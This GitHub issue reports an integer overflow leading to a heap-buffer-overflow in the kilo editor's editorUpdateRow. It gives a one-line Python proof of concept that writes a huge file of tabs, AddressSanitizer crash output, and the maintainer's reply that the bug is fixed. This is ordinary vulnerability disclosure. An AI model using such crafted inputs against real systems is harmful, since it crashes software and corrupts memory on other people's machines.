Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Integer Overflow && heap-buffer-overflow in kilo.c #60

Closed
Kirin-say opened this issue Aug 27, 2019 · 2 comments
Closed

Integer Overflow && heap-buffer-overflow in kilo.c #60

Kirin-say opened this issue Aug 27, 2019 · 2 comments

Comments

@Kirin-say
Copy link

There is a heap overflow caused by integer overflow in kilo.c.
POC:

python -c "print '\t'*477218598" > ./exp

In command line:

make CC="clang-4.0 -fsanitize=address"
./kilo  ./exp

Output:

=================================================================
==18601==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x608000000077 at pc 0x00000050f641 bp 0x7ffd0126fe50 sp 0x7ffd0126fe48
WRITE of size 1 at 0x608000000077 thread T0
    #0 0x50f640  (/home/kirin/kilo/kilo+0x50f640)
    #1 0x50fde0  (/home/kirin/kilo/kilo+0x50fde0)
    #2 0x511ae0  (/home/kirin/kilo/kilo+0x511ae0)
    #3 0x514833  (/home/kirin/kilo/kilo+0x514833)
    #4 0x7f99a53a0b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #5 0x41c339  (/home/kirin/kilo/kilo+0x41c339)

0x608000000077 is located 0 bytes to the right of 87-byte region [0x608000000020,0x608000000077)
allocated by thread T0 here:
    #0 0x4d1990  (/home/kirin/kilo/kilo+0x4d1990)
    #1 0x50f45e  (/home/kirin/kilo/kilo+0x50f45e)
    #2 0x50fde0  (/home/kirin/kilo/kilo+0x50fde0)
    #3 0x511ae0  (/home/kirin/kilo/kilo+0x511ae0)
    #4 0x514833  (/home/kirin/kilo/kilo+0x514833)
    #5 0x7f99a53a0b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/kirin/kilo/kilo+0x50f640) 
Shadow bytes around the buggy address:
  0x0c107fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c107fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00[07]fa
  0x0c107fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==18601==ABORTING

Analyze:
There is an integer overflow in function editorUpdateRow:

    for (j = 0; j < row->size; j++)
        if (row->chars[j] == TAB) tabs++;

    row->render = malloc(row->size + tabs*8 + nonprint*9 + 1);
    idx = 0;
    for (j = 0; j < row->size; j++) {
        if (row->chars[j] == TAB) {
            row->render[idx++] = ' ';
......

The space size being malloc will be calculated based on the number of TABs in one row.
When the number of TAB is too big,it will lead to Integer Overflow. And it will lead to heap-buffer-overflow finally.

@smile-e3
Copy link

smile-e3 commented Sep 9, 2019

why my code is:

==51677==ERROR: AddressSanitizer failed to allocate 0x1999c000 (429506560) bytes of LargeMmapAllocator (error code: 12)
==51677==Process memory map follows:
	0x000000400000-0x000000548000	/home/clb/binary/kilo/kilo
	0x000000747000-0x000000748000	/home/clb/binary/kilo/kilo
	0x000000748000-0x00000074c000	/home/clb/binary/kilo/kilo
	0x00000074c000-0x0000013b1000	
	0x00007fff7000-0x00008fff7000	
	0x00008fff7000-0x02008fff7000	
	0x02008fff7000-0x10007fff8000	
	0x600000000000-0x602000000000	
	0x602000000000-0x602000010000	
	0x602000010000-0x602e00000000	
	0x602e00000000-0x602e00010000	
	0x602e00010000-0x604000000000	
	0x604000000000-0x604000010000	
	0x604000010000-0x604e00000000	
	0x604e00000000-0x604e00010000	
	0x604e00010000-0x60c000000000	
	0x60c000000000-0x60c000010000	
	0x60c000010000-0x60ce00000000	
	0x60ce00000000-0x60ce00010000	
	0x60ce00010000-0x616000000000	
	0x616000000000-0x616000010000	
	0x616000010000-0x616e00000000	
	0x616e00000000-0x616e00010000	
	0x616e00010000-0x621000000000	
	0x621000000000-0x621000010000	
	0x621000010000-0x621e00000000	
	0x621e00000000-0x621e00010000	
	0x621e00010000-0x624000000000	
	0x624000000000-0x624000010000	
	0x624000010000-0x624e00000000	
	0x624e00000000-0x624e00010000	
	0x624e00010000-0x625000000000	
	0x625000000000-0x625000010000	
	0x625000010000-0x625e00000000	
	0x625e00000000-0x625e00010000	
	0x625e00010000-0x629000000000	
	0x629000000000-0x629000010000	
	0x629000010000-0x629e00000000	
	0x629e00000000-0x629e00010000	
	0x629e00010000-0x62d000000000	
	0x62d000000000-0x62d000010000	
	0x62d000010000-0x62de00000000	
	0x62de00000000-0x62de00010000	
	0x62de00010000-0x631000000000	
	0x631000000000-0x631000020000	
	0x631000020000-0x631e00000000	
	0x631e00000000-0x631e00010000	
	0x631e00010000-0x640000000000	
	0x640000000000-0x640000003000	
	0x7f33a4662000-0x7f33af400000	
	0x7f33af500000-0x7f33af600000	
	0x7f33af661000-0x7f33b1a36000	
	0x7f33b1a36000-0x7f33b1bf6000	/lib/x86_64-linux-gnu/libc-2.23.so
	0x7f33b1bf6000-0x7f33b1df6000	/lib/x86_64-linux-gnu/libc-2.23.so
	0x7f33b1df6000-0x7f33b1dfa000	/lib/x86_64-linux-gnu/libc-2.23.so
	0x7f33b1dfa000-0x7f33b1dfc000	/lib/x86_64-linux-gnu/libc-2.23.so
	0x7f33b1dfc000-0x7f33b1e00000	
	0x7f33b1e00000-0x7f33b1e16000	/lib/x86_64-linux-gnu/libgcc_s.so.1
	0x7f33b1e16000-0x7f33b2015000	/lib/x86_64-linux-gnu/libgcc_s.so.1
	0x7f33b2015000-0x7f33b2016000	/lib/x86_64-linux-gnu/libgcc_s.so.1
	0x7f33b2016000-0x7f33b2019000	/lib/x86_64-linux-gnu/libdl-2.23.so
	0x7f33b2019000-0x7f33b2218000	/lib/x86_64-linux-gnu/libdl-2.23.so
	0x7f33b2218000-0x7f33b2219000	/lib/x86_64-linux-gnu/libdl-2.23.so
	0x7f33b2219000-0x7f33b221a000	/lib/x86_64-linux-gnu/libdl-2.23.so
	0x7f33b221a000-0x7f33b2322000	/lib/x86_64-linux-gnu/libm-2.23.so
	0x7f33b2322000-0x7f33b2521000	/lib/x86_64-linux-gnu/libm-2.23.so
	0x7f33b2521000-0x7f33b2522000	/lib/x86_64-linux-gnu/libm-2.23.so
	0x7f33b2522000-0x7f33b2523000	/lib/x86_64-linux-gnu/libm-2.23.so
	0x7f33b2523000-0x7f33b252a000	/lib/x86_64-linux-gnu/librt-2.23.so
	0x7f33b252a000-0x7f33b2729000	/lib/x86_64-linux-gnu/librt-2.23.so
	0x7f33b2729000-0x7f33b272a000	/lib/x86_64-linux-gnu/librt-2.23.so
	0x7f33b272a000-0x7f33b272b000	/lib/x86_64-linux-gnu/librt-2.23.so
	0x7f33b272b000-0x7f33b2743000	/lib/x86_64-linux-gnu/libpthread-2.23.so
	0x7f33b2743000-0x7f33b2942000	/lib/x86_64-linux-gnu/libpthread-2.23.so
	0x7f33b2942000-0x7f33b2943000	/lib/x86_64-linux-gnu/libpthread-2.23.so
	0x7f33b2943000-0x7f33b2944000	/lib/x86_64-linux-gnu/libpthread-2.23.so
	0x7f33b2944000-0x7f33b2948000	
	0x7f33b2948000-0x7f33b296e000	/lib/x86_64-linux-gnu/ld-2.23.so
	0x7f33b2990000-0x7f33b2b5d000	
	0x7f33b2b5d000-0x7f33b2b6d000	
	0x7f33b2b6d000-0x7f33b2b6e000	/lib/x86_64-linux-gnu/ld-2.23.so
	0x7f33b2b6e000-0x7f33b2b6f000	/lib/x86_64-linux-gnu/ld-2.23.so
	0x7f33b2b6f000-0x7f33b2b70000	
	0x7ffe0835b000-0x7ffe0837d000	[stack]
	0x7ffe083a9000-0x7ffe083ac000	[vvar]
	0x7ffe083ac000-0x7ffe083ae000	[vdso]
	0xffffffffff600000-0xffffffffff601000	[vsyscall]
==51677==End of process memory map.
==51677==AddressSanitizer CHECK failed: /build/llvm-toolchain-4.0-euGZ6h/llvm-toolchain-4.0-4.0/projects/compiler-rt/lib/sanitizer_common/sanitizer_common.cc:120 "((0 && "unable to mmap")) != (0)" (0x0, 0x0)
    #0 0x4dc0df  (/home/clb/binary/kilo/kilo+0x4dc0df)
    #1 0x4f7055  (/home/clb/binary/kilo/kilo+0x4f7055)
    #2 0x4e6571  (/home/clb/binary/kilo/kilo+0x4e6571)
    #3 0x4f01c6  (/home/clb/binary/kilo/kilo+0x4f01c6)
    #4 0x423c14  (/home/clb/binary/kilo/kilo+0x423c14)
    #5 0x4d1f24  (/home/clb/binary/kilo/kilo+0x4d1f24)
    #6 0x50f16e  (/home/clb/binary/kilo/kilo+0x50f16e)
    #7 0x50faf0  (/home/clb/binary/kilo/kilo+0x50faf0)
    #8 0x5117f0  (/home/clb/binary/kilo/kilo+0x5117f0)
    #9 0x514543  (/home/clb/binary/kilo/kilo+0x514543)
    #10 0x7f33b1a5682f  (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #11 0x4198c8  (/home/clb/binary/kilo/kilo+0x4198c8)


I become a fool!!

@antirez
Copy link
Owner

antirez commented Jul 2, 2020

Fixed, thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants